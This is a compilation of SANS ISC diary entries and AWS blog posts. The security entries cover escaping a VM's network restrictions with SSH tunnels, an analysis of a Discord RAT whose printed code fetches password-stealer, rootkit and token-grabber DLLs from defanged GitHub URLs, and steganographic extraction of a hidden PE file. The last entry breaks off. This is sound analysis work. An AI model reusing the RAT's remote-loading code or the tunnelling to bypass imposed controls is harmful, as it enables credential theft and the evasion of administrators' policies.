No Internet Access? SSH to the Rescue!, (Thu, May 8th)

This quick diary is a perfect example of why I love Linux (and UNIX-like operating systems in general). There is always a way to "escape" settings imposed by an admin…

Disclaimer: This has been used for testing purposes in the scope of a security assessment project. Don't break your organization's security policies!

To perform some assessments on a remote network, a customer provided me with a VM running Ubuntu, reachable through SSH (with IP filtering, SSH key authentication only, etc.). Once logged on to the system, I started to work but was missing some tools and decided to install them. Bad news… the VM had no Internet access. No problem, we have SSH access!

Let's assume the following environment:

  • server.acme.org is the VM. SSH listening on port 65022.
  • client.sans.edu is my workstation with SSH listening on port 22.

Step 1: From client.sans.edu, connect to the server in one terminal and create a reverse tunnel ("-R" option):

ssh -p 65022 -i .ssh/privatekey -R 2222:localhost:22 xavier@server.acme.org

Step 2: From a second terminal, start a second session to the server:

ssh -p 65022 -i .ssh/privatekey xavier@server.acme.org

Step 3: From the second session, connect back to the client and set up dynamic port forwarding ("-D"):

ssh -p 2222 -D 1080 xavier@localhost

Step 4: From the first session, set the proxy environment variables:

export http_proxy=socks5h://127.0.0.1:1080
export https_proxy=socks5h://127.0.0.1:1080
curl https://ipinfo.io/

curl should report that your IP address is the one of client.sans.edu!

Now, all tools that honor these variables will have access to the Internet through your client! Slow but effective!
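
For example, here is a minimal sketch to confirm from Python that the proxy variables are honored. This assumes the requests and PySocks packages are already present on the VM; any HTTP client that reads the *_proxy variables will behave the same way.

# Minimal sketch: confirm the SOCKS tunnel works from Python.
# Assumes the "requests" and "PySocks" packages are installed on the VM.
import os
import requests

proxy = "socks5h://127.0.0.1:1080"     # the -D port opened in step 3
os.environ["http_proxy"] = proxy       # honored by most proxy-aware tools
os.environ["https_proxy"] = proxy

# socks5h:// also pushes DNS resolution through the tunnel.
print(requests.get("https://ipinfo.io/json", timeout=10).json())

Side note: if both ends run OpenSSH 7.6 or newer, reverse dynamic forwarding ("-R 1080" with only a port, no destination) can even collapse steps 1 to 3 into a single session.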

There are for sure many other ways to achieve this, but… that's the magic of UNIX: there are always plenty of ways to solve issues. Please share your ideas or techniques!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

In the works – AWS South America (Chile) Region

Today, Amazon Web Services (AWS) announced plans to launch a new AWS Region in Chile by the end of 2026. The AWS South America (Chile) Region will consist of three Availability Zones at launch, bringing AWS infrastructure and services closer to customers in Chile. This new Region joins the AWS South America (São Paulo) and AWS Mexico (Central) Regions as our third AWS Region in Latin America. Each Availability Zone is separated by a meaningful distance to support applications that need low latency while significantly reducing the risk of a single event impacting availability.

Skyline of Santiago de Chile with modern office buildings in the financial district in Las Condes

The new AWS Region will bring advanced cloud technologies, including artificial intelligence (AI) and machine learning (ML), closer to customers in Latin America. Through high-bandwidth, low-latency network connections over dedicated, fully redundant fiber, the Region will support applications requiring synchronous replication while giving you the flexibility to run workloads and store data locally to meet data residency requirements.

AWS in Chile
In 2017, AWS established an office in Santiago de Chile to support local customers and partners. Today, there are business development teams, solutions architects, partner managers, professional services consultants, support staff, and personnel in various other roles working in the Santiago office.

As part of our ongoing commitment to Chile, AWS has invested in several infrastructure offerings throughout the country. In 2019, AWS launched an Amazon CloudFront edge location in Chile. This provides a highly secure and programmable content delivery network that accelerates the delivery of data, videos, applications, and APIs to users worldwide with low latency and high transfer speeds.

AWS strengthened its presence in 2021 with two significant additions. First, an AWS Ground Station antenna location in Punta Arenas, offering a fully managed service for satellite communications, data processing, and global satellite operations scaling. Second, AWS Outposts in Chile, bringing fully managed AWS infrastructure and services to virtually any on-premises or edge location for a consistent hybrid experience.

In 2023, AWS further enhanced its infrastructure with two key developments, an AWS Direct Connect location in Chile that lets you create private connectivity between AWS and your data center, office, or colocation environment, and AWS Local Zones in Santiago, placing compute, storage, database, and other select services closer to large population centers and IT hubs. The AWS Local Zone in Santiago helps customers deliver applications requiring single-digit millisecond latency to end users.

The upcoming AWS South America (Chile) Region represents our continued commitment to fueling innovation in Chile. Beyond building infrastructure, AWS plays a crucial role in developing Chile’s digital workforce through comprehensive cloud education initiatives. Through AWS Academy, AWS Educate, and AWS Skill Builder, AWS provides essential cloud computing skills to diverse groups—from students and developers to business professionals and emerging IT leaders. Since 2017, AWS has trained more than two million people across Latin America on cloud skills, including more than 100,000 in Chile.

AWS customers in Chile
AWS customers in Chile have been increasingly moving their applications to AWS and running their technology infrastructure in AWS Regions around the world. With the addition of this new AWS Region, customers will be able to provide even lower latency to end users and use advanced technologies such as generative AI, the Internet of Things (IoT), and mobile services to drive innovation across sectors such as banking. This Region will give AWS customers the ability to run their workloads and store their content in Chile.

Here are some examples of customers in Chile using AWS to drive innovation:

The Digital Government Secretariat (SGD) is the Chilean government institution responsible for proposing and coordinating the implementation of the Digital Government Strategy, providing an integrated government approach. SGD coordinates, advises, and provides cross-sector support in the strategic use of digital technologies, data, and public information to improve state administration and service delivery. To fulfill this mission, SGD relies on AWS to operate critical digital platforms including Clave Única (single sign-on), FirmaGob (digital signature), the State Electronic Services Integration Platform (PISEE), DocDigital, SIMPLE, and the Administrative Procedures and Services Catalog (CPAT), among others.

Transbank, Chile’s largest payment solutions ecosystem managing the largest percentage of national transactions, used AWS to significantly reduce time-to-market for new products. Moreover, Transbank implemented multiple AWS-powered solutions, enhancing team productivity and accelerating innovation. These initiatives showcase how financial technology companies can use AWS to drive innovation and operational efficiency. “The new AWS Region in Chile will be very important for us,” said Jorge Rodríguez M., Chief Architecture and Technology Officer (CA&TO) of Transbank. “It will further reduce latency, improve security and expand the possibilities for innovation, allowing us to serve our customers with new and better services and products.”

To learn more about AWS customers in Chile, visit AWS Customer Success Stories.

AWS sustainability efforts in Chile
AWS is committed to water stewardship in Chile through innovative conservation projects. In the Maipo Basin, which provides essential water for the Metropolitan Santiago and Valparaiso regions, AWS has partnered with local farmers and climate-tech company Kilimo to implement water-saving initiatives. The project involves converting 67 hectares of agricultural land from flood to drip irrigation, which will save approximately 200 million liters of water annually.

This water conservation effort supports AWS's commitment to be water positive by 2030 and demonstrates our dedication to environmental sustainability in the communities where AWS operates. The project uses efficient drip irrigation systems that deliver water directly to plant root systems through a specialized pipe network, maximizing water efficiency for agricultural use. To learn more about this initiative, read our blog post AWS expands its water replenishment program to China and Chile—and adds projects in the US and Brazil.

AWS community in Chile
The AWS community in Chile is one of the most active in the region, comprising AWS Community Builders, two AWS User Groups (AWS User Group Chile and AWS Girls Chile), and an AWS Cloud Club. These groups hold monthly events and have organized two AWS Community Days. At the first Community Day, held in 2023, we had the honor of having Jeff Barr as the keynote speaker.

Chile AWS Community Day 2023

Stay tuned
We’ll announce the opening of this and the other Regions in future blog posts, so be sure to stay tuned! To learn more, visit the AWS Region in Chile page.

Eli

Thanks to Leonardo Vilacha for the Chile AWS Community Day 2023 photo.



Example of "Modular" Malware, (Wed, May 7th)

Developers (of malware as well as goodware) don't have to reinvent the wheel all the time. Why rewrite a piece of code that was already developed by someone else? In the same way, all operating systems provide API calls (or system calls) to interact with the hardware (open a file, display a pixel, send a packet over the wire, etc.). These calls are grouped in libraries (example: Windows provides wininet.dll to interact with networks).

Briefly, developers have different ways to use libraries:

  • Static linking: The library is added (appended) to the user code by the linker at compile time.
  • Dynamic loading: The library is loaded by the "loader" when the program is started and made available to the program (the well-known "DLL" files).
  • On-demand loading: The developer decides at runtime that it's time to load an extra DLL into the program's environment (see the sketch after this list).
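
To make the on-demand idea concrete outside of any malware context, here is a minimal Python sketch using ctypes: nothing is loaded at program start, and the shared library is only mapped into the process the first time the feature that needs it is called. The use of the math library is purely illustrative; on Windows the same idea maps to LoadLibrary() or, in .NET, Assembly.Load().

# Minimal, benign sketch of "on-demand loading": the library is only
# loaded into the process when the feature that needs it is first used.
import ctypes
import ctypes.util

_libm = None  # nothing is loaded at program start

def fancy_math(x: float) -> float:
    global _libm
    if _libm is None:
        # Locate and load the math library only now (on demand).
        path = ctypes.util.find_library("m")
        _libm = ctypes.CDLL(path)
        _libm.cos.restype = ctypes.c_double
        _libm.cos.argtypes = [ctypes.c_double]
    return _libm.cos(x)

if __name__ == "__main__":
    print(fancy_math(0.0))  # the library gets loaded here, not earlier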

In the malware ecosystem, the third method is pretty cool because attackers can develop "modular" malware that expands its capabilities only when needed. Let's imagine a malware sample that first fingerprints the victim's computer. If the victim is an administrative employee and the malware discovers some SAP-related files or processes, it can fetch a specific DLL from a C2 server and load it to add features targeting SAP systems. Besides being smaller, the malware may also look less suspicious.

Here is an example of such malware that expands its capabilities on demand. The file is a Discord RAT (SHA256:9cac561e2da992f974286bdb336985c1ee550abd96df68f7e44ce873ef713f4e)[1]. The sample is .NET malware and can be easily decompiled. Good news: there is no obfuscation implemented and the code is pretty easy to read.

The list of "modules" or external DLLs is provided in a dictionary:

public static Dictionary<string, string> dll_url_holder = new Dictionary<string, string>
{
  { "password", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dll" },
  { "rootkit", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll" },
  { "unrootkit", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.dll" },
  { "webcam", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll" },
  { "token", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll" }
};

Let's take an example: Webcam.dll:

remnux@remnux:/MalwareZoo/20250507$ file Webcam.dll
Webcam.dll: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows

DLLs are loaded only when required by the malware. The RAT has a command "webcampic" to take a picture of the victim:

"--> !webcampic = Take a picture out of the selected webcam"

Let's review the function associated with this command:

public static async Task webcampic(string channelid)
{
    if (!dll_holder.ContainsKey("webcam"))
    {
        await LoadDll("webcam", await LinkToBytes(dll_url_holder["webcam"]));
    }
    if (!activator_holder.ContainsKey("webcam"))
    {
        activator_holder["webcam"] = Activator.CreateInstance(dll_holder["webcam"].GetType("Webcam.webcam"));
        activator_holder["webcam"].GetType().GetMethod("init").Invoke(activator_holder["webcam"], new object[0]);
    }
    object obj = activator_holder["webcam"];
    obj.GetType().GetMethod("init").Invoke(activator_holder["webcam"], new object[0]);
    if ((obj.GetType().GetField("cameras").GetValue(obj) as IDictionary<int, string>).Count < 1)
    {
        await Send_message(channelid, "No cameras found!");
        await Send_message(channelid, "Command executed!");
        return;
    }
    try
    {
        byte[] item = (byte[])obj.GetType().GetMethod("GetImage").Invoke(obj, new object[0]);
        await Send_attachment(channelid, "", new List<byte[]> { item }, new string[1] { "webcam.jpg" });
        await Send_message(channelid, "Command executed!");
    }
    catch
    {
        await Send_message(channelid, "Error taking picture!");
        await Send_message(channelid, "Command executed!");
    }
}

"dll_holder" is a dictionary that contains addresses of loaded DLLs:

public static async Task LoadDll(string name, byte[] data)
{
    dll_holder[name] = Assembly.Load(data);
}

In the webcampic function, if the DLL has not been loaded yet, the DLL file is fetched from the GitHub repository, converted into a byte array, and loaded in memory. Once the DLL is loaded, its main class is instantiated and invoked through reflection. Here is the decompiled code of Webcam.dll:

namespace Webcam
{
    public class webcam
    {
        public static Dictionary<string, bool> ready = new Dictionary<string, bool>();
        public static Dictionary<string, Bitmap> holder = new Dictionary<string, Bitmap>();
        public static Dictionary<int, string> cameras = new Dictionary<int, string>();
        public static int selected = 1;
        public static string GetWebcams()
        {
            // Code removed
        }
        public static byte[] GetImage()
        {
            // Code removed
        }
        private static void video_NewFrame(object sender, NewFrameEventArgs eventArgs, string key)
        {
            // Code removed
        }
        public static bool select(int num)
        {
            // Code removed
        }
        public static void init()
        {
            GetWebcams();
        }
    }
}

This is a simple example of "modular" malware! Happy hunting!

[1] https://www.virustotal.com/gui/file/9cac561e2da992f974286bdb336985c1ee550abd96df68f7e44ce873ef713f4e/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Accelerate the transfer of data from an Amazon EBS snapshot to a new EBS volume

Today we are announcing the general availability of Amazon Elastic Block Store (Amazon EBS) Provisioned Rate for Volume Initialization, a feature that accelerates the transfer of data from an EBS snapshot (a highly durable backup of volumes stored in Amazon Simple Storage Service (Amazon S3)) to a new EBS volume.

With Amazon EBS Provisioned Rate for Volume Initialization, you can create fully performant EBS volumes within a predictable amount of time. You can use this feature to speed up the initialization of hundreds of concurrent volumes and instances. You can also use this feature when you need to recover from an existing EBS Snapshot and need your EBS volume to be created and initialized as quickly as possible. You can use this feature to quickly create copies of EBS volumes with EBS Snapshots in a different Availability Zone, AWS Region, or AWS account. Provisioned Rate for Volume Initialization for each volume is charged based on the full snapshot size and the specified volume initialization rate.

This new feature expedites the volume initialization process by fetching the data from an EBS snapshot to an EBS volume at a consistent rate that you specify, between 100 MiB/s and 300 MiB/s. The snapshot blocks are downloaded from Amazon S3 to the volume at this rate.

By specifying the volume initialization rate, you can create a fully performant volume in a predictable time, which increases operational efficiency and gives you visibility into the expected time of completion. If you run utilities like fio or dd to expedite volume initialization for workflows such as application recovery or volume copies for testing and development, this feature removes the operational burden of managing such scripts while bringing consistency and predictability to your workflows.

Get started with specifying the volume initialization rate
To get started, you can choose the volume initialization rate when you launch your EC2 instance or create your volume from the snapshot.

1. Create a volume in the EC2 launch wizard
When launching new EC2 instances in the launch wizard of EC2 console, you can enter a desired Volume initialization rate in the Storage (volumes) section.

You can also set the volume initialization rate when creating and modifying the EC2 Launch Templates.

In the AWS Command Line Interface (AWS CLI), you can add the VolumeInitializationRate parameter to the block device mappings when calling the run-instances command.

aws ec2 run-instances \
    --image-id ami-0abcdef1234567890 \
    --instance-type t2.micro \
    --subnet-id subnet-08fc749671b2d077c \
    --security-group-ids sg-0b0384b66d7d692f9 \
    --key-name MyKeyPair \
    --block-device-mappings file://mapping.json

Contents of mapping.json. This example adds /dev/sdh, an empty EBS volume with a size of 8 GiB.

[
    {
        "DeviceName": "/dev/sdh",
        "Ebs": {
            "VolumeSize": 8,
            "VolumeType": "gp3",
            "VolumeInitializationRate": 300
        }
    }
]

To learn more, visit block device mapping options, which defines the EBS volumes and instance store volumes to attach to the instance at launch.

2. Create a volume from snapshots
When you create a volume from snapshots, you can also choose Create volume in the EC2 console and specify the Volume initialization rate.

Confirm your new volume with the initialization rate.

In the AWS CLI, you can use the VolumeInitializationRate parameter when calling the create-volume command.

aws ec2 create-volume --region us-east-1 --cli-input-json '{
    "AvailabilityZone": "us-east-1a",
    "VolumeType": "gp3",
    "SnapshotId": "snap-07f411eed12ef613a",
    "VolumeInitializationRate": 300
}'

If the command runs successfully, you will receive a result similar to the following.

{
    "AvailabilityZone": "us-east-1a",
    "CreateTime": "2025-01-03T21:44:53.000Z",
    "Encrypted": false,
    "Size": 100,
    "SnapshotId": "snap-07f411eed12ef613a",
    "State": "creating",
    "VolumeId": "vol-0ba4ed2a280fab5f9",
    "Iops": 300,
    "Tags": [],
    "VolumeType": "gp2",
    "MultiAttachEnabled": false,
    "VolumeInitializationRate": 300
}
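
If you prefer to script this, a minimal boto3 equivalent of the create-volume call above could look like the sketch below. This assumes your installed boto3/botocore release already exposes the VolumeInitializationRate parameter; the snapshot ID is the placeholder from the example.

# Minimal sketch: create a volume from a snapshot with a provisioned
# initialization rate. Assumes a boto3/botocore release that already
# supports the VolumeInitializationRate parameter.
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")
response = ec2.create_volume(
    AvailabilityZone="us-east-1a",
    VolumeType="gp3",
    SnapshotId="snap-07f411eed12ef613a",   # placeholder from the example above
    VolumeInitializationRate=300,          # MiB/s, between 100 and 300
)
print(response["VolumeId"], response["State"])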

You can also set the volume initialization rate when replacing root volumes of EC2 instances and provisioning EBS volumes using the EBS Container Storage Interface (CSI) driver.

After the volume is created, EBS keeps track of the hydration progress and publishes an Amazon EventBridge notification to your account when hydration completes, so you can be certain when your volume is fully performant.

To learn more, visit Create an Amazon EBS volume and Initialize Amazon EBS volumes in the Amazon EBS User Guide.

Now available
Amazon EBS Provisioned Rate for Volume Initialization is available today and supported for all EBS volume types. You will be charged based on the full snapshot size and the specified volume initialization rate. To learn more, visit the Amazon EBS Pricing page.

To learn more about Amazon EBS, including this feature, take the free digital course on the AWS Skill Builder portal. The course includes use cases, architecture diagrams, and demos.

Give this feature a try in the Amazon EC2 console today and send feedback to AWS re:Post for Amazon EBS or through your usual AWS Support contacts.

— Channy



Amazon Q Developer in GitHub (in preview) accelerates code generation

Starting today, you can use Amazon Q Developer in GitHub in preview! This is fantastic news for the millions of developers who use GitHub on a daily basis, whether at work or for personal projects. They can now use Amazon Q Developer for feature development, code reviews, and Java code migration directly within the GitHub interface.

To demonstrate, I’m going to use Amazon Q Developer to help me create an application from zero called StoryBook Teller. I want this to be an ASP.NET Core website using .NET 9 that takes three images from the user and uses Amazon Bedrock with Anthropic’s Claude to generate a story based on them.

Let me show you how this works.

Installation

The first thing you need to do is install the Amazon Q Developer application in GitHub, and you can begin using it immediately without connecting to an AWS account.

You’ll then be presented with a choice to add it to all your repositories or select specific ones. In this case, I want to add it to my storybook-teller-demo repo, so I choose Only selected repositories and type in the name to find it.

This is all you need to do to make the Amazon Q Developer app ready to use inside your selected repos. You can verify that the app is installed by navigating to your GitHub account Settings and the app should be listed in the Applications page.

You can choose Configure to view permissions and add Amazon Q Developer to repositories or remove it at any time.

Now let’s use Amazon Q Developer to help us build our application.

Feature development
When Amazon Q Developer is installed into a repository, you can assign GitHub issues to the Amazon Q development agent to develop features for you. It will then generate code using the whole codebase in your repository as context, as well as the issue’s description. This is why it’s important to list your requirements as accurately and clearly as possible in your GitHub issues, as you should always strive to do anyway.

I have created five issues in my StoryBook Teller repository that cover all my requirements for this app, from creating a skeleton .NET 9 project to implementing frontend and backend.

Let’s use Amazon Q Developer to develop the application from scratch and help us implement all these features!

To begin with, I want Amazon Q Developer to help me create the .NET project. To do this, I open the first issue, and in the Labels section, I find and select Amazon Q development agent.

That’s all there is to it! The issue is now assigned to Amazon Q Developer. After the label is added, the Amazon Q development agent automatically starts working behind the scenes providing progress updates through the comments, starting with one saying, I'm working on it.

As you might expect, the amount of time it takes will depend on the complexity of the feature. When it’s done, it will automatically create a pull request with all the changes.

The next thing I want to do is make sure that the generated code works, so I’m going to download the code changes and run the app locally on my computer.

I go to my terminal and type git fetch origin pull/6/head:pr-6 to get the code for the pull request it created. I double-check the contents and I can see that I do indeed have an ASP.NET Core project generated using .NET 9, as I expected.

I then run dotnet run and open the app with the URL given in the output.

Brilliant, it works! Amazon Q Developer took care of implementing this one exactly as I wanted based on the requirements I provided in the GitHub issue. Now that I have tested that the app works, I want to review the code itself before I accept the changes.

Code review
I go back to GitHub and open the pull request. I immediately notice that Amazon Q Developer has performed some automatic checks on the generated code.

This is great! It has already done quite a bit of the work for me. However, I want to review it before I merge the pull request. To do that, I navigate to the Files changed tab.

I review the code, and I like what I see! However, looking at the contents of .gitignore, I notice something that I want to change. I can see that Amazon Q Developer made good assumptions and added exclusion rules for Visual Studio (VS) Code files. However, JetBrains Rider is my favorite integrated development environment (IDE) for .NET development, so I want to add rules for it, too.

You can ask Amazon Q Developer to iterate and make changes by using the normal code review flow in the GitHub interface. In this case, I add a comment to the .gitignore code saying, add patterns to ignore Rider IDE files. I then choose Start a review, which will queue the change in the review.

I select Finish your review and Request changes.

Soon after I submit the review, I’m redirected to the Conversation tab. Amazon Q Developer starts working on it, resuming the same feedback loop and encouraging me to continue with the review process until I’m satisfied.

Every time Q Developer makes changes, it will run the automated checks on the generated code. In this case, the code was somewhat straightforward, so it was expected that the automatic code review wouldn’t raise any issues. But what happens if we have more complex code?

Let’s take another example and use Amazon Q Developer to implement the feature for enabling image uploads on the website. I use the same flow I described in the previous section. However, I notice that the automated checks on the pull request flagged a warning this time, stating that the API generated to support image uploads on the backend is missing authorization checks, effectively allowing direct public access. It explains the security risk in detail and provides useful links.

It then automatically generates a suggested code fix.

When it’s done, you can review the code and choose to Commit changes if you’re happy with the changes.

After fixing this and testing it, I’m happy with the code for this issue and move on, applying the same process to the other ones. I assign the Amazon Q development agent to each one of my remaining issues, wait for it to generate the code, and go through the iterative review process, asking it to fix any issues for me along the way. I then test my application at the end of that software cycle and am very pleased to see that Amazon Q Developer managed to handle all issues, from project setup, to boilerplate code, to more complex backend and frontend. A true full-stack developer!

I did notice some things that I wanted to change along the way. For example, it defaulted to using the Invoke API to send the uploaded images to Amazon Bedrock instead of the Converse API. However, because I didn’t state this in my requirements, it had no way of knowing. This highlights the importance of being as precise as possible in your issues’ titles and descriptions to give Q Developer the necessary context and make the development process as efficient as possible.

Having said that, it’s still straightforward to review the generated code on the pull requests, add comments, and let the Amazon Q Developer agent keep working on changes until you’re happy with the final result. Alternatively, you can accept the changes in the pull request and create separate issues that you can assign to Q Developer later when you’re ready to develop them.

Code transformation
You can also transform legacy Java codebases to modern versions with Q Developer. Currently, it can update applications from Java 8 or Java 11 to Java 17, with more options coming in future releases.

The process is very similar to the one I demonstrated earlier in this post, except for a few things.

First, you need to create an issue within a GitHub repository containing a Java 8 or Java 11 application. The title and description don’t really matter in this case. It might even be a short title such as “Migration,” leaving the description empty. Then, on Labels, you assign the Amazon Q transform agent label to the issue.

Much like before, Amazon Q Developer will start working immediately behind the scenes before generating the code on a pull request that you can review. This time, however, it’s the Amazon Q transform agent doing the work; it is specialized in code migration and takes all the necessary steps to analyze and migrate the code from Java 8 to Java 17.

Notice that it also needs a workflow to be created, as per the documentation. If you don’t have it enabled yet, it will display clear instructions to help you get everything set up before trying again.

As expected, the amount of time needed to perform a migration depends on the size and complexity of your application.

Conclusion
Using Amazon Q Developer in GitHub is like having a full-stack developer that you can collaborate with to develop new features, accelerate the code review process, and rely on to enhance the security posture and quality of your code. You can also use it to automate the migration of Java 8 and 11 applications to Java 17, making it much easier to get started on that migration project that you might have been postponing for a while. Best of all, you can do all this from the comfort of your own GitHub environment.

Now available
You can now start using Amazon Q Developer today for free in GitHub, no AWS account setup needed.

Amazon Q Developer in GitHub is currently in preview.

Matheus Guimaraes | codingmatheus



Amazon Q Developer elevates the IDE experience with new agentic coding experience

Today, Amazon Q Developer introduces a new, interactive, agentic coding experience that is now available in the integrated development environment (IDE) for Visual Studio Code. This experience brings interactive coding capabilities, building upon existing prompt-based features. You now have a natural, real-time collaborative partner working alongside you while writing code, creating documentation, running tests, and reviewing changes.

Amazon Q Developer transforms how you write and maintain code by providing transparent reasoning for its suggestions and giving you the choice between automated modifications or step-by-step confirmation of changes. As a daily user of the Amazon Q Developer command line interface (CLI) agent, I’ve experienced firsthand how the Amazon Q Developer chat interface makes software development a more efficient and intuitive process. Having an AI-powered assistant only a q chat away in the CLI has streamlined my daily development workflow, enhancing the coding process.

The new agentic coding experience in Amazon Q Developer in the IDE seamlessly interacts with your local development environment. You can read and write files directly, execute bash commands, and engage in natural conversations about your code. Amazon Q Developer comprehends your codebase context and helps complete complex tasks through natural dialog, maintaining your workflow momentum while increasing development speed.

Let’s see it in action
To begin using Amazon Q Developer for the first time, follow the steps in the Getting Started with Amazon Q Developer guide to access Amazon Q Developer. When using Amazon Q Developer, you can choose between Amazon Q Developer Pro, a paid subscription service, or Amazon Q Developer Free tier with AWS Builder ID user authentication.

For existing users, update to the new version. Refer to Using Amazon Q Developer in the IDE for activation instructions.

To start, I select the Amazon Q icon in my IDE to open the chat interface. For this demonstration, I’ll create a web application that transforms Jupyter notebooks from the Amazon Nova sample repository into interactive applications.

I send the following prompt: In a new folder, create a web application for video and image generation that uses the notebooks from multimodal-generation/workshop-sample as examples to create the applications. Adapt the code in the notebooks to interact with models. Use existing model IDs

Amazon Q Developer then examines the files: the README file, notebooks, notes, and everything that is in the folder where the conversation is positioned. In our case it’s at the root of the repository.

After completing the repository analysis, Amazon Q Developer initiates the application creation process. Following the prompt requirements, it requests permission to execute the bash command for creating necessary folders and files.

With the folder structure in place, Amazon Q Developer proceeds to build the complete web application.

In a few minutes, the application is complete. Amazon Q Developer provides the application structure and deployment instructions, which can be converted into a README file upon request in the chat.

During my initial attempt to run the application, I encountered an error. I described it in Spanish using Amazon Q chat.

Amazon Q Developer responded in Spanish and gave me the solutions and code modifications in Spanish! I loved it!

After implementing the suggested fixes, the application ran successfully. Now I can create, modify, and analyze images and videos using Amazon Nova through this newly created interface.

The preceding images showcase my application’s output capabilities. Because I asked to modify the video generation code in Spanish, it gave me the message in Spanish.

Things to know
Chatting in natural languages – Amazon Q Developer IDE supports many languages, including English, Mandarin, French, German, Italian, Japanese, Spanish, Korean, Hindi, and Portuguese. For detailed information, visit the Amazon Q Developer User Guide page.

Collaboration and understanding – The system examines your repository structure, files, and documentation while giving you the flexibility to interact seamlessly through natural dialog with your local development environment. This deep comprehension allows for more accurate and contextual assistance during development tasks.

Control and transparency – Amazon Q Developer provides continuous status updates as it works through tasks and lets you choose between automated code modifications or step-by-step review, giving you complete control over the development process.

Availability – Amazon Q Developer interactive, agentic coding experience is now available in the IDE for Visual Studio Code.

Pricing – Amazon Q Developer agentic chat is available in the IDE at no additional cost to both Amazon Q Developer Pro Tier and Amazon Q Developer Free tier users. For detailed pricing information, visit the Amazon Q Developer pricing page.

To learn more about getting started visit the Amazon Q Developer product web page.

— Eli



Steganography Analysis With pngdump.py: Bitstreams, (Thu, May 1st)

A friend asked me if my pngdump.py tool can extract individual bits from an image (cfr. diary entry "Steganography Analysis With pngdump.py").

It cannot. But another tool can: format-bytes.py.

In the diary entry I mentioned, a PE file is embedded inside a PNG file according to a steganographic method: all the bytes of a channel are replaced by the bytes that make up the PE file. If one were to visualize this image, it would be clear that it represents nothing: it just looks like noise.

Often with steganography, the purpose is to hide a message in some medium, without distorting that medium too much. If it's a picture for example, then one would not notice a difference between the original picture and the altered picture upon visual inspection.

This is often achieved by making small changes to the colors that define individual pixels. Take an 8-bit RGB encoding: each pixel is represented by 3 bytes, one for the intensity of red, one for green, and one for blue. By changing just the least significant bit (LSB) of each byte that represents the RGB color of the pixel, one can encode 3 bits per pixel without a noticeable change in the final color (it's a change smaller than 0.5% (1/256)).
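
To illustrate the idea (this is a generic sketch, not the exact encoder used for the image below), LSB embedding and extraction over a flat buffer of color bytes can be expressed in a few lines of Python:

# Minimal sketch of LSB steganography over a flat buffer of color bytes:
# each carrier byte donates its least significant bit, 8 carrier bytes
# per payload byte, bits joined in big-endian order.

def embed(carrier: bytearray, payload: bytes) -> bytearray:
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    assert len(bits) <= len(carrier), "carrier too small"
    for i, bit in enumerate(bits):
        carrier[i] = (carrier[i] & 0xFE) | bit   # overwrite only the LSB
    return carrier

def extract(carrier: bytes, length: int) -> bytes:
    out = bytearray()
    for i in range(length):
        byte = 0
        for bit in carrier[i * 8:(i + 1) * 8]:
            byte = (byte << 1) | (bit & 1)       # big-endian join
        out.append(byte)
    return bytes(out)

if __name__ == "__main__":
    pixels = bytearray(range(256)) * 10          # stand-in for raw RGB bytes
    secret = b"MZ..."                            # stand-in for a PE header
    assert extract(embed(pixels, secret), len(secret)) == secret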

Take these pictures for example:

The one on the left is the original picture, the one on the right has an embedded PE file (via LSB steganography). I can't see a difference.

To extract the PE file from the picture on the right, one has to extract the LSB of each color byte, and assemble them into bytes. This can be done with format-bytes.py.

format-bytes.py takes binary data as input and parses it per the instructions of the analyst. I typically use it to parse bytes, like in this example:

format-bytes.py -f "<IBB"

This means the input data should be parsed as an unsigned 32-bit integer (I), little-endian (<), followed by two unsigned bytes (BB).

But format-bytes.py can also extract individual bits: this is done with bitstream processing. Let me show you an example.

The steganographic lake image I created contains an embedded PE file. The bits that make up the bytes of the PE file are stored in the least significant bit of each color byte of the pixels in the image.

First I encoded the length of the PE file as an unsigned, little-endian 32-bit integer, using the LSBs of the pixels. This is followed by the PE file itself, also encoded in the LSBs of the pixels.

The following command decodes the length:

pngdump.py -R -d lake-exe.png   | cut-bytes.py 0:32l   | format-bytes.py -d -f "bitstream=f:B,b:0,j:>"   | format-bytes.py

pngdump.py's option -R extracts the raw bitmap of the image, option -d does a binary dump.

This bitmap data is piped into cut-bytes.py to select the first 32 bytes (0:32l). We want the first 32 bytes to extract the 32 LSBs that make up the length of the embedded PE file.

format-bytes.py's option -f "bitstream=f:B,b:0,j:>" instructs the tool to operate on the bit level (bitstream) and to treat the incoming data as individual unsigned bytes (f:B, e.g., format B), to select the least significant bit (b:0, e.g., the bit at position 0 in the byte) and to assemble the extracted bits into bytes in big-endian order (j:>, e.g., join in big-endian order).

That produces 4 bytes, which can then be piped into another instance of format-bytes.py, this time to parse the integer.

The output produced by the second instance of format-bytes.py represents the incoming data in different formats. The line that starts with 4I shows the formatting of 4-byte-long integers; ul stands for unsigned & little-endian. Thus the length of the PE file is 58120; this is stored in the LSBs of the first 32 bytes of the raw image.
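
For readers who want to double-check, the same parse is a one-liner in Python (the data variable simply holds the 4 bytes produced by the bitstream extraction, i.e., the little-endian representation of 58120):

# Parse the 4 decoded bytes as an unsigned, little-endian 32-bit
# integer -- the equivalent of format-bytes.py's "<I" format.
import struct

data = bytes.fromhex("08e30000")   # 58120 encoded little-endian
(length,) = struct.unpack("<I", data)
print(length)                      # 58120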

Now that we know the length of the PE file, we know how many bits to extract: 58120 * 8 = 464960. So starting at byte 32 of the raw image, we take 464960 bytes and process them with the same bitstream method (but this time, I do a HEX/ASCII dump (-a) to view the extracted PE file):

